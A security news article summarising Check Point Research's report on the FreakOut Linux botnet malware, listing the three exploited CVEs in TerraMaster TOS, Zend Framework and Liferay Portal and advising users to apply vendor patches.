FreakOut malware exploits new Linux vulnerabilities

FreakOut malware exploits new Linux vulnerabilities

Security researchers have discovered a new malware dubbed “FreakOut” that exploits new Linux vulnerabilities.

Check Point Research (CPR) discovered multiple attacks that use a malware variant FreakOut to exploit multiple vulnerabilities on three separate Linux-based products.

“The goal behind these attacks is to create an IRC botnet (a collection of machines infected with malware that can be controlled remotely), which can then be used for malicious activities, such as launching DDoS attacks on other organizations’ networks, or for crypto-mining activity on infected machines, which can potentially shut down entire systems infected,” Check Point explained in the blog post.

Linux device targets

The Check Point security experts confirmed the FreakOut malware targets and exploits vulnerabilities on three Linux-based products (and CVEs):

  • TerraMaster TOS (TerraMaster Operating System) data storage systems – CVE-2020-28188)
  • Zend Framework (open source, object-oriented web application framework used to build web pages) – CVE-2021-3007 
  • Liferay Portal (open source portal for building web apps) – CVE-2020-7961.

The TerraMaster remote code execution vulnerability CVE-2020-28188 could allow a remote unauthenticated attacker to inject OS commands via /include/makecvs.php in Event parameter.

Moreover, the Liferay vulnerability CVE-2020-7961 could allow remote attackers to execute arbitrary code via JSON web services (JSONWS).

Once a device is infected by FreakOut, attackers use the malware as a remote-controlled attack platform to then target other unpatched machines to spread the infection.

“The FreakOut malware’s capabilities include port scanning, information gathering, creation and sending of data packets, network sniffing, and the capability to launch DDoS and network flooding attacks,” Check Point added.

Furthermore, Check Point spotted more than 380 attack attempts between January 8 and January 13 against its customers. All of those attacks were blocked.

Users of these products should check out vendor advisories for TerraMaster, Liferay Portal and Zend framework for the latest patches.

Related Articles